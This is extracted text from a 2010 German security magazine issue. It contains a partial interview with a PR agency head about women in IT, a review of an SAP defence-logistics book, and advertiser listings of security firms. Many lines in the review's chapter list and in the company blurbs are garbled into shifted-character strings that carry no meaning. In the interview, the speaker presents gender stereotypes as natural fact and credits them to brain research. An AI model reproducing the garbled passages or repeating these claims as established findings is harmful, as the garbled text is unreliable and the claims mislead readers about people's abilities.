aber die Aufgabe, ohne spezielles Hintergrundwissen
über komplexe Technologien detaillierte Berichte zu
formulieren. Da dies den Ehrgeiz in mir weckte, ar-
beitete ich mich schnell in die Materie ein und stell-
te fest, dass Public Relations in Verbindung mit der
Erstellung technologischer Texte mein Steckenpferd
ist. Heute bin ich Geschäftsführerin meiner eigenen
PR-Agentur und obwohl ich mittlerweile auch in wei-
teren Branchen und Aufgabengebieten zuhause bin,
ist die Freude daran, „trockene“ und komplexe Inhalte
lebendig werden zu lassen, noch genauso vorhanden
wie am ersten Tag.

hakin9: Viele glauben, dass Computer Männersache

sind. Was halten Sie davon?
Ulrike Peter: Die landläufige Meinung existiert nach
wie vor, dass Männer ein besseres technologisches
Verständnis mitbringen. Dies resultiert nicht selten
aus Vorurteilen, lässt sich aber auch nicht komplett
abstreiten. Denn nicht nur Erfahrungswerte, sondern
auch Belege aus der Hirnforschung zeigen, dass
Frauen besser mit Sprache umgehen können und
Männer sich in Naturwissenschaften wohler fühlen.
Es liegt wohl ein Stück weit in der Natur der Sache.

44 10/2010
 Interview mit Ulrike Peter
zen“ in beide Richtungen mehr und mehr verschwim-
men. Denn auch Männer finden wir heute in Berufen,
die vor Jahren ausschließlich Frauen zugeordnet wur-
den. Und wir sind zwar von elektronischen Geräten wie
PCs, Smartphones etc. umgeben und diese werden
auch rege von beiden Geschlechtern genutzt – aber ei-
nen technischen Job zu ergreifen ist ein anderes paar
Schuhe. Hierzu gehört ein besonderes Faible. Die Be-
weggründe, weshalb in diesem Segment Frauenman-
gel herrscht, sind meiner Meinung nach: Ihnen fehlt
manchmal der Mut, sie erhalten nicht immer die glei-
chen Chancen oder – und das wird der Hauptgrund sein
– es liegen schlichtweg die Interessen in anderen Be-
reichen.
hakin9: Woraus resultieren die Vorurteile gegen die
Frauen, die sich mit Computern beschäftigen?
Ulrike Peter: Die IT ist (und bleibt es sicher auch) eine
Männerdomäne – Frauen in der IT-Branche sind Para-
diesvögel. Wie in allen Berufen, in denen seit jeher ein
Geschlecht etabliert ist, sich Prozesse eingeschliffen
und bewährt haben, ist es erst einmal fremd und ge-
wöhnungsbedürftig, wenn sie sich verändern. So liegen
die Vorurteile zum einen daran, dass es nicht üblich ist,
wenn Frauen in diesen Berufen arbeiten und Männern
die „Technik“ zugeordnet wird – zum anderen resultie-
ren sie daraus, dass die unterschiedlichen Fähigkeiten
und Interessen der Geschlechter einfach naturgege-
ben sind. So wie kleine Jungen mit Autos spielen und
Mädchen mit Puppen, stecken auch später gewisse
Verhaltensweisen und Interessen in uns, die bereits in
der Kindheit geprägt werden. Greift das weibliche Ge-
schlecht im Berufsleben plötzlich zum „Auto“, so ist dies
ungewöhnlich und wird erst einmal hinterfragt.
hakin9: Wie sieht die Situation von Frauen in der IT-
Branche aus? Ist es leicht, als begabte IT-Expertin
einen Job in einem Unternehmen zu bekommen?
Ulrike Peter: Frauen in der IT-Branche sind häufig in
Marketingabteilungen zu finden – aber zum Beispiel
auch bei der schreibenden Zunft in Fachverlagen. In
diesen Jobs herrscht in meinen Augen Chancengleich-
heit. Als IT-Expertin in einem technischen Beruf wie Ad-
ministrator, Entwickler oder Ähnliches sieht es dagegen
anders aus. In diesem Segment haben es weibliche
Fachkräfte meiner Ansicht nach schwerer. Die Hürde,
zum Bewerbungsgespräch eingeladen zu werden, ist
höher. Bekommt sie die Chance dazu, wird vielleicht et-
was genauer hingeschaut, aber letztlich zählt die Kom-
petenz, die unterm Strich den entscheidenden Aus-
schlag geben wird.
hakin9: Wie werden Frauen von Männern als ihre
Mitarbeiter wahrgenommen?
Ulrike Peter: Dies lässt sich nicht pauschalisieren
und richtet sich zum einen nach der Einstellung des
hakin9.org/de
Vorgesetzten und zum anderen nach den Fähigkeiten
der Frau. Jeder Mitarbeiter, der neu eingestellt wird,
steht vor der Aufgabe, sich zu beweisen – und sollte
die Möglichkeit dazu erhalten. Jedoch werden Frau-
en in typischen Männerberufen oft kritischer beäugt
und stehen länger auf dem Prüfstand. Dies passiert
teils unbewusst. Auch beweisen Studien immer wie-
der, dass männliche Arbeitnehmer im gleichen Job
mehr verdienen als weibliche. Hier macht die Gesell-
schaft aber eine Entwicklung durch und dies reguliert
sich sicherlich zumindest ein Stück weit im Laufe der
nächsten Jahre.
hakin9: Was macht Ihnen am meisten Spaß bei der
Arbeit in der IT-Branche?
Ulrike Peter: Bevor ich mich selbständig machte, war
ich bereits in einem anderen Unternehmen in der Ge-
schäftsleitung tätig – jedoch konnte ich den Stift zum
Schreiben nie aus der Hand legen. Es reizt mich, im-
mer wieder neue technologische Themen zu erkunden
und dabei nicht nur an der Oberfläche zu kratzen, son-
dern Detailtiefe zu erlangen, um fundiert und lesens-
wert über ein Thema berichten zu können. Im Laufe
der Jahre habe ich eine starke Affinität zur IT-Security
entwickelt. Ich finde es spannend, über Sicherheits-
lücken, Verschlüsselungstechniken und vieles weite-
re zu schreiben. Darüber hinaus macht es mir großen
Spaß, IT-Unternehmen durch die richtige PR-Strategie
nach vorn zu bringen und entsprechende Maßnahmen
in die Tat umsetzen. Beim Kennenlernen eines poten-
ziellen Neukunden im ersten Moment manchmal hin-
sichtlich der technischen Fachkompetenz unterschätzt
zu werden und dann schnell durch Know-how zu über-
zeugen, bestätigt mich immer wieder in dem, was ich
tue.
hakin9: Was sollte unternommen werden, um
die Ressentiments von Frauen gegenüber IT-Jobs
abzubauen?
Ulrike Peter: Ich glaube, dem kann man bzw. Frau nur
entgegenwirken, indem sie den Mut hat, ihre Interessen
zu verfolgen und sie unter Beweis zu stellen. Aus Er-
fahrung: wenn jemand seine Fähigkeiten zeigt und en-
gagiert an eine Sache herangeht, rückt das Geschlecht
automatisch in den Hintergrund.
Wir bedanken uns für das Gespräch!
45
 REZENSIONEN
SAP for DFPS
Implementierung
und Customizing
Galileo Press, Bonn 2010
1. Auflage 2010
Autoren:
Bernhard Escherich
Heinrich Pfriemer
Wolfgang Ullwer
as Buch SAP for DFPS Implementierung und
D
Customizing, basiert auf mehr als 20 Jahren Er-
fahrung die die Autoren insgesamt bei der Ent-
wicklung, Implementierung, aber auch Schulung der
Lösung sammeln konnten.
Die über 650 Seiten vollgepacktes Wissen sollten sie
nicht abschrecken dieses Buch in die Hand zu nehmen.
Es ist sehr gut und flüssig geschrieben. Man schafft es,
sollten sie ein schneller LeserIn sein in zwei Tagen.
Sie benötigen keine tiefgreifenden SAP-Kenntnisse
zum Verständnis, daher ist es für Entscheider genauso
geeignet wie für Projektleiter, Architekten, funktionale
Mitarbeiter, Basismitarbeiter oder externe Berater.
Komplexe Zusammenhänge werden sehr schön und
bildhaft beschrieben, damit auch für den SAP-Laien,
das Vorgehen verständlich beschrieben wird. Erwäh-
nenswert finde ich in diesem Zusammenhang Rubiks
Zauberwürfel.
Das Buch ist sehr strukturiert aufgebaut und
umfasst unverzichtbare Grundlagen in den Teilen I-III.
Für Experten wird es dann in Teil IV richtig spannend
und interessant.
Die von SAP entwickelte fast eierlegende Wollmilch-
sau, erfordert ein umfangreiches Nachschlagewerk, zur
Implementierung. Den Autoren ist dies hiermit gelun-
gen.
Ihnen ist es außerdem gelungen aufzuzeigen, wie
komplexe „Unternehmensstrukturen“ bewältigt und Kos-
ten reduziert und kontrolliert werden können.
Das Beispielprojekt „Tsunami“ verdeutlicht dabei an
einem nicht so komplexen Projekt die Anforderungen.
Beleuchtet wird z.B. wie militärische Kernprozesse, wie
etwa die Logistik substanzielle Einsparungen von ca.
30% erzielen könnten, als auch die Unterstützung von
Einsätzen verbessert werden könnten (Beschleunigung
der Verlegung um bis zu 50 -70%).
Des Weiteren wird die Interoperabilität sehr schön he-
raus gestellt und die integrativen Aspekte stets im Blick
behalten.
46
Hervorheben sollte man die organisatorische Flexi-
bilität und Logistik wie das Logistic Assessment, Pro-
zessmanagement, Qualification Management inkl. der
Übernahme von Trainingsdaten, das Managementkon-
zept BSC (Balanced Scorcard), die Einsatzmöglichkei-
ten von mobilen Anwendungen für Schutzaufgaben,
SOA und NCW bzw. NetFüOp mit DFPS.
Der Mehrwert wird z.B. am Meldewesen der NC3A
durch Automatisierung von weiten Teilen, schön heraus
gearbeitet.
Die ausführlichen bebilderten Beispiele, stellen eine
gelungene Verbindung zwischen Theorie und Praxis
bzw. Anwendung dar. In der SAP-typischen Struktur
wurden die neuen und bereits erwähnten Funktionen
sinnvoll und gekonnt integriert.
Des Weiteren findet sich für die richtige IT-Architektur
ein schön gefüllter Werkzeugkasten mit den dazuge-
hörigen Do’s and Dont’s. Natürlich darf auch das best
practices nicht fehlen, sowie der Ausblick auf zukünftige
Entwicklungen.
Egal ob sie sich für eine Neuintegration oder eine Co-
re2Defense Lösung entscheiden,
die Kapitel zu den Themen:
‡ /RJLVWLN!161XQG,8,'
‡ /RJLVWLN!+HUVWHOOHUWHLOHQXPPHUQ
‡ ,QVWDQGKDOWXQJ!7HFKQLVFKH3OlW]HXQG
‡ 5ROOHQLP')363URMHNW
möchte ich ihnen unbedingt ans Herz legen.
FAZIT:
Dieses Buch sollte keinem Entscheider und IT-Verant-
wortlichen vorenthalten werden.
Prädikat besonders empfehlenswert.
Autor: Nicole Huck
10/2010

Datenschutz ist EU-weit gesetzliche Anforde-
rung. Wir sorgen für die Erfüllung rechtlicher
Vorschriften und kümmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen, auch international.
www.blossey-partner.de
Securitymanager.de ist eine Produktion des
Online-Verlag FEiG & PARTNER. Seit dem
Start hat sich Securitymanager.de zu einem
führenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhängiger Informationsdienstleister der
IT- und Information-Security-Branche.
www.securitymanager.de
Pericom base camp IT-Security: Unser Ziel ist
es, unsere Kunden vor möglichen Gefahren
für Ihre IT-Infrastruktur bestmöglich zu schüt-
zen. Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir, durch
die Implementierung von Security-Lösungen,
Schutz vor konkreten Gefahren.
www.pericom.at
Wollen Sie Ihre Seite empfehlen, kontaktieren Sie bitte: de@hakin9.org
Recommended Sites
Die Netzwerktechnik steht auf www.easy-ne-
twork.de im Mittelpunkt. Artikel, Tutorials und
ein Forum bieten genügen Stoff für kommende
$GPLQLVWUDWRUHQXQG1HW]ZHUNSUR¿V
www.easy-network.de
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges, IT-Quiz, Web-Bibliothek, Multi-
media-Center & vielen weiteren Features.
www.happy-security.de
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfügung: Nutzer
können auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen. Es können weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeräumt und somit ein sicherer Daten-
austausch ermöglicht werden.
www.cloudsafe.com
Die Seed Forensics GmbH bietet für Strafver-
folgungsbehörden professionelle Unterstützung
in den Bereichen der Datensicherstellung und
Datenträgerauswertung. Selbstverständlich
entsprechen unsere Mitarbeiter, unser tech-
nisches Equipment und auch unsere Räumli-
chkeiten den notwendigen Anforderungen.
www.seed-forensics.de
+LHU ¿QGHVW 'X DOOHV ZDV GDV +HU] HLQHV
Computerfreaks höher schlagen lässt: Geek
Wear mit intelligenten Sprüchen, eine riesige
Auswahl Gadgets und natürlich auch viele
Hacker Tools.
www.getDigital.de
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhängigen Testhäuser
für Antiviren-Software.
www.av-comparatives.org
 Recommended Companies
Mabunta
'LH PDEXQWD *PE+ DJLHUW DOV KRFK
spezialisierter und kompetenter Partner
UXQG XP ,76HFXULW\ XQG 1HW]ZHUN/|
VXQJHQ:LUXQWHUVWW]HQEHL,76LFKHU
heitsfragen in allen Unternehmens-
bereichen, verbinden Wachstum mit
sicherer Kommunikation.
Alles in allem- mabunta „one-face-to-
the-customer“, Ihr Spezialist in Fragen
GHU,76LFKHUKHLW
www.mabunta.de
SEC Consult
SEC Consult ist der führende Berater
SEC Consult für Information Security Consulting in
Zentraleuropa. Die vollständige Unab-
hängigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden. Unsere Dienstleistungen umfa-
ssen externe/interne Sicherheitsaudits,
(Web-) Applikationssicherheit (ONR 17-
700), Sicherheitsmanagement-Prozesse
(ISO 27001) etc.
www.sec-consult.com
Tele-Consulting GmbH
9RP%6,DNNUHGLWLHUWHV3UÀDERUIU,7
Sicherheit, hakin9 und c’t Autoren, jah-
relange Erfahrung bei der Durchführung
von Penetrationstests und Security-Au-
dits, eigener Security Scanner „tajanas”,
Sicherheitskonzepte, Risikoanalysen,
,7*UXQGVFKXW]%HUDWXQJ  OL]HQ]LHUWH
ISO 27001-Auditoren, VoIP-Planung
und -Security
www.tele-consulting.com
secXtreme GmbH
schützt Ihre Web-Anwendungen bis
auf Applikationsebene. Dazu gehört
sowohl die Prüfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen für Sicherheit im
Entwicklungsprozess und Schutzlö-
sungen (Web Application Firewalls) bei
*UR‰XQWHUQHKPHQXQGGHPJHKREHQHQ
Mittelstand.
www.sec-Xtreme.com
B1 Systems
Die B1 Systems ist international tätig
in den Bereichen Linux/Open Source
&RQVXOWLQJ 7UDLQLQJ XQG 6XSSRUW B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster.
info@b1-systems.de
www.b1-systems.de
Blossey & Partner
Consulting Datenschutzbüro
Datenschutz ist EU-weit gesetzliche An-
forderung. Wir sorgen für die Erfüllung
rechtlicher Vorschriften und kümmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen,
auch international. Wir erledigen alle er-
forderlichen Aufgaben, die Fäden behal-
ten Sie in der Hand. Nutzen Sie unser
Erstberatungsgespräch.
www.blossey-partner.de
Recommended Companies
NESEC
NESEC ist Ihr Spezialist für Penetra-
tionstests, Sicherheitsanalysen und
,76HFXULW\ &RXQVXOWLQJ 'DV 1(6(&
3HQWHVW7HDP XQWHUVWW]W 6LH EHL 6L
cherheitsprüfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits. Bei Bedarf optimieren
wir Ihre Policy, sensibilisieren Ihre
0LWDUEHLWHU XQG ]HUWL¿]LHUHQ ,KU 8QWHU
nehmen nach ISO 27001.
www.nesec.de
Seed Forensics GmbH
'LH 6HHG )RUHQVLFV *PE+ ELHWHW
für Strafverfolgungsbehörden profe-
ssionelle Unterstützung in den
Bereichen der Datensicherstellung
und Datenträgerauswertung. Selbst-
verständlich entsprechen unsere
Mitarbeiter, unser technisches Equip-
0ment und auch unsere Räumlichkeiten
den notwendigen Anforderungen.
www.seed-forensics.de
Protea Networks
3URWHD LVW VSH]LDOLVLHUW DXI ,76HFXULW\
Lösungen: Verschlüsselung, Firewall/
931 $XWKHQWL¿]LHUXQJ &RQWHQW)LOWH
ring, etc. Wir bieten umfassende Bera-
tung, Vertrieb von Security-Hard- und
Software, Installation und umfangreiche
'LHQVWOHLVWXQJHQ]%.RQ]HSWLRQ7UDL
nings). Protea setzt auf Lösungen der
0DUNW XQG 7HFKQRORJLHIKUHU XQG KlOW
dafür direkten inhouse-Support bereit.
www.proteanetworks.de
SecureNet GmbH, München
Als Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen: Anwendungs-Pentests, Sour-
FHFRGHDQDO\VHQ 6HFXUH &RGLQJ *XL
delines, Beratung rund um den Software
'HYHORPHQW/LIHF\FOH7RROV$SSOLFDWLRQ
Firewalls, Application Scanner, Fortify
6&$'HIHQGHU7UDFHU
www.securenet.de
m-privacy GmbH
,76LFKHUKHLWVO|VXQJHQ±IXQNWLRQDOXQG
einfach zu bedienen!
So präsentieren sich die von m-privacy
HQWZLFNHOWHQ 7LJKW*DWHŒ6HUYHU ]%
7LJKW*DWHŒ3UR PLW 'DWHQVFKXW]*
tesiegel. Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage, Online-Razzien und
gezielten Angriffen!
www.m-privacy.de
OPTIMAbit GmbH
Wir sind Spezialisten für Entwicklung
XQG 6HFXULW\ :LU VLFKHUQ -DYD 1(7
und Mobile Applikationen gegen Angriffe
externer und interner Art. Unsere Dien-
ste umfassen Audits, Code Reviews,
Penetrationstest, sowie die Erstellung
von Policies. Zusätzlich bieten wir Semi-
QDUH]XVLFKHUKHLWVUHOHYDQWHQ7KHPHQ
www.optimabit.com
secadm
secadm ist durchtrainierter Spezialist für
Airbags, ABS und Sicherheitsgurte in der
,7 =HKQ ,76LFKHUKHLWVH[SHUWHQ PLW 
Mannjahren Erfahrung beraten, entwi-
FNHOQ XQG LPSOHPHQWLHUHQ ,7/|VXQJHQ
für Kunden weltweit. Der Fokus liegt da-
EHLDXI7KHPHQZLH3UR]HVV2SWLPLHUXQJ
und Security-Management. Risiko-Analy-
se, die Sicherheitsberatung, Auditing, Se-
curity-Leitfäden, Software-Entwicklung,
5HSRUWLQJELV]XP7UDLQLQJ
www.secadm.de
underground_8
secure computing gmbh
Wir entwickeln und vertreiben securi-
W\ DSSOLDQFHV IU GLH %HUHLFKH 8QL¿HG
7KUHDW 0DQDJHPHQW 7UDI¿F 6KDSLQJ
und Antispam. Unsere Lösungen sind
hardwarebasiert und werden über Dis-
tributoren, Reseller und Systemintegra-
toren implementiert und vertrieben.
www.underground8.com